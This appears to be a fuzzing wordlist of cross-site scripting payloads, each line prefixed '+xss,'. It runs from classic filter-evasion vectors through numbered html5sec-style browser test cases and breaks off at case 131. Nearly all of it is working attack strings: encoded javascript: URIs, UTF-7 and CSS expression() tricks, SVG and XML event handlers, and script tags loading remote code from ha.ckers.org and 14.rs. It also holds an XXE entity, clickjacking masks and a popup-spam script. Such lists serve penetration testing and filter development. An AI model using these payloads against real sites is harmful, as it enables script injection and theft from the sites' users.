+xss,'SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>' +xss,'<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>' +xss,'<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>' +xss,'<IMG SRC="jav ascript:alert('XSS');">' +xss,'<IMG SRC="jav&#x09;ascript:alert('XSS');">' +xss,'<IMG SRC="jav&#x0A;ascript:alert('XSS');">' +xss,'<IMG SRC="jav&#x0D;ascript:alert('XSS');">' +xss,'<IMG SRC=" &#14; javascript:alert('XSS');">' +xss,'<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>' +xss,'<IMG SRC="javascript:alert('XSS')"' +xss,'<SCRIPT>a=/XSS/' +xss,'\";alert('XSS');//' +xss,'<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">' +xss,'<BODY BACKGROUND="javascript:alert('XSS')">' +xss,'<BODY ONLOAD=alert('XSS')>' +xss,'<IMG DYNSRC="javascript:alert('XSS')">' +xss,'<IMG LOWSRC="javascript:alert('XSS')">' +xss,'<BGSOUND SRC="javascript:alert('XSS');">' +xss,'<BR SIZE="&{alert('XSS')}">' +xss,'<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>' +xss,'<LINK REL="stylesheet" HREF="javascript:alert('XSS');">' +xss,'<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">' +xss,'<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>' +xss,'<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">' +xss,'<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>' +xss,'<IMG SRC='vbscript:msgbox("XSS")'>' +xss,'<IMG SRC="mocha:[code]">' +xss,'<IMG SRC="livescript:[code]">' +xss,'<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">' +xss,'<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">' +xss,'<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">' +xss,'<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">' +xss,'<IFRAME SRC="javascript:alert('XSS');"></IFRAME>' +xss,'<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>' +xss,'<TABLE BACKGROUND="javascript:alert('XSS')">' +xss,'<DIV STYLE="background-image: url(javascript:alert('XSS'))">' +xss,'<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">' +xss,'<DIV STYLE="width: expression(alert('XSS'));">' +xss,'<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>' +xss,'<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">' +xss,'<XSS STYLE="xss:expression(alert('XSS'))">' +xss,'exp/*<XSS STYLE='no\xss:noxss("*//*");' +xss,'<STYLE TYPE="text/javascript">alert('XSS');</STYLE>' +xss,'<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>' +xss,'<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>' +xss,'<BASE HREF="javascript:alert('XSS');//">' +xss,'<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>' +xss,'<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>' +xss,'getURL("javascript:alert('XSS')")' +xss,'a="get";' +xss,'<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">' +xss,'<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>' +xss,'<HTML><BODY>' +xss,'<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>' +xss,'<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->' +xss,'<? echo('<SCR)';' +xss,'<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">' +xss,'<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-' +xss,'<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>' +xss,'<svg%0Aonload=%09((pro\u006dpt))()//' +xss,'<sCriPt x>(((confirm)))``</scRipt x>' +xss,'<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z' +xss,'<deTAiLs/open/oNtoGGle=confirm()>' +xss,'<scRiPt y="><">/*<sCRipt* */prompt()</script' +xss,'<A href="javascript%26colon;confirm()">click' +xss,'<sVg oNloaD=write()>' +xss,'<A href=javas%26#99;ript:alert(1)>click' +xss,'<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>' +xss,'<svG/x=">"/oNloaD=confirm()//' +xss,'<--`<iMG/srC=` onerror=confirm``> --!>' +xss,'<SVg </onlOad ="1> (_=prompt,_(1)) "">' +xss,'<!--><scRipT src=//14.rs>' +xss,'<sCriPt/src=//14.rs?' +xss,'<sCRIpt x=">" src=//15.rs></script>' +xss,'<D3/OnMouSEenTer=[2].find(confirm)>z' +xss,'<D3"<"/OncLick="1>[confirm``]"<">z' +xss,'<D3/OnpOinTeReENter=confirm``>click here' +xss,'<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>' +xss,'<Z oncut=alert()>x' +xss,'<iFrAMe/src \/\/onload = prompt(1)' +xss,'<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>' +xss,'>>> vectors()' +xss,'<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>' +xss,'<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div>' +xss,'<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>' +xss,'<div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->' +xss,'<![><img src="]><img src=x onerror=alert(39)//">' +xss,'<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->' +xss,'<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>' +xss,'<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>' +xss,'<div id="41"><li style=list-style:url() onerror=alert(41)></li>' +xss,'<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>' +xss,'<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>' +xss,'<div id="43"><?xml version="1.0" standalone="no"?>' +xss,'<html xmlns="http://www.w3.org/1999/xhtml">' +xss,'<head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head>' +xss,'<body>Hello</body>' +xss,'</html>//["'`-->]]>]</div>' +xss,'<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>' +xss,'<div id="53"><xml id="xss" src="test.htc"></xml>' +xss,'<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>' +xss,'<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>' +xss,'<div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div>' +xss,'<div id="62"><!-- IE 6-8 -->' +xss,'<x '="foo"><x foo='><img src=x onerror=alert(62)//'>' +xss,'<!-- IE 6-9 -->' +xss,'<! '="foo"><x foo='><img src=x onerror=alert(2)//'>' +xss,'<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div>' +xss,'<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF' +xss,'<img src="javascript:alert(2)">' +xss,'<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓' +xss,'<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>' +xss,'<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>' +xss,'<div id="66"><?xml version="1.0"?>' +xss,'<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>' +xss,'<root/>//["'`-->]]>]</div>' +xss,'<div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(2)">]><img />//["'`-->]]>]</div>' +xss,'<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div>' +xss,'<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>' +xss,'<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>' +xss,'<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>' +xss,'<div id="87"><svg xmlns="http://www.w3.org/2000/svg">' +xss,'<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">' +xss,'<animation xlink:href="javascript:alert(88)"/>' +xss,'<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>' +xss,'<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>' +xss,'<foreignObject xlink:href="javascript:alert(88)"/>' +xss,'<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="89"><svg xmlns="http://www.w3.org/2000/svg">' +xss,'<set attributeName="onmouseover" to="alert(89)"/>' +xss,'<animate attributeName="onunload" to="alert(89)"/>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="90"><!-- Up to Opera 10.63 -->' +xss,'<div style=content:url(test2.svg)></div>' +xss,'<!-- Up to Opera 11.64 - see link below -->' +xss,'<!-- Up to Opera 12.x -->' +xss,'<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>' +xss,'<div id="91">[A]' +xss,'<? foo="><script>alert(91)</script>">' +xss,'<! foo="><script>alert(91)</script>">' +xss,'</ foo="><script>alert(91)</script>">' +xss,'<? foo="><x foo='?><script>alert(91)</script>'>">' +xss,'<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">' +xss,'<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>' +xss,'<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>' +xss,'<div id="94"><svg xmlns="http://www.w3.org/2000/svg">' +xss,'<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">' +xss,'<feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>' +xss,'<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>' +xss,'<div id="97"><!-- IE 5-9 -->' +xss,'<div id=d><x xmlns="><iframe onload=alert(97)"></div>' +xss,'<script>d.innerHTML+='';</script>' +xss,'<!-- IE 10 in IE5-9 Standards mode -->' +xss,'<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>' +xss,'<script>d.innerHTML+='';</script>//["'`-->]]>]</div>' +xss,'<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>' +xss,'<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>' +xss,'<div id="99">XXX<style>' +xss,'*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */' +xss,'<!--' +xss,'--><!--*{color:red} /* all UA */' +xss,'*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */' +xss,'</style>//["'`-->]]>]</div>' +xss,'<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>' +xss,'<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">' +xss,'<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>' +xss,'<div id="108"><!-- IE 5-8 standards mode -->' +xss,'<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">' +xss,'<!-- IE 5-9 standards mode -->' +xss,'<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">' +xss,'<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>' +xss,'<div id="109"><svg xmlns="http://www.w3.org/2000/svg">' +xss,'<a id="x"><rect fill="white" width="1000" height="1000"/></a>' +xss,'<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="110"><svg xmlns="http://www.w3.org/2000/svg">' +xss,'<path d="M0,0" style="marker-start:url(test4.svg#a)"/>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>' +xss,'<div id="113"><div id="x">XXX</div>' +xss,'<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div>' +xss,'<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>' +xss,'<div id="115"><!--[if]><script>alert(115)</script -->' +xss,'<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div>' +xss,'<div id="116"><div id="x">x</div>' +xss,'<xml:namespace prefix="t">' +xss,'<import namespace="t" implementation="#default#time2">' +xss,'<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>' +xss,'<div id="117"><a href="http://attacker.org">' +xss,'<iframe src="http://example.org/"></iframe>' +xss,'</a>//["'`-->]]>]</div>' +xss,'<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div>' +xss,'<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>' +xss,'<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>' +xss,'<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>' +xss,'<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script>' +xss,'<body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>' +xss,'<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"' +xss,'xmlns:svg="http://www.w3.org/2000/svg">' +xss,'<body style="background:gray">' +xss,'<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>' +xss,'<svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body>' +xss,'</html>//["'`-->]]>]</div>' +xss,'<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>' +xss,'<div id="123"><span class=foo>Some text</span>' +xss,'<a class=bar href="http://www.example.org">www.example.org</a>' +xss,'<script src="http://code.jquery.com/jquery-1.4.4.js"></script>' +xss,'<script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div>' +xss,'<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10' +xss,'<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>' +xss,'<div id="125"><?xml version="1.0"?>' +xss,'<?xml-stylesheet type="text/xml" href="#stylesheet"?>' +xss,'<!DOCTYPE doc [' +xss,'<!ATTLIST xsl:stylesheet id ID #REQUIRED>]>' +xss,'<svg xmlns="http://www.w3.org/2000/svg">' +xss,'<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div>' +xss,'<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>' +xss,'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>' +xss,'<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">' +xss,'<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>' +xss,'<handler id="y">alert(127)</handler>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>' +xss,'<div id="129"><svg>' +xss,'<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="130"><math href="javascript:alert(130)">CLICKME</math>' +xss,'<math>' +xss,'<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>' +xss,'<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>' +xss,'</math>//["'`-->]]>]</div>' +xss,'<div id="131"><b>drag and drop one of the following strings to the drop box:</b>' 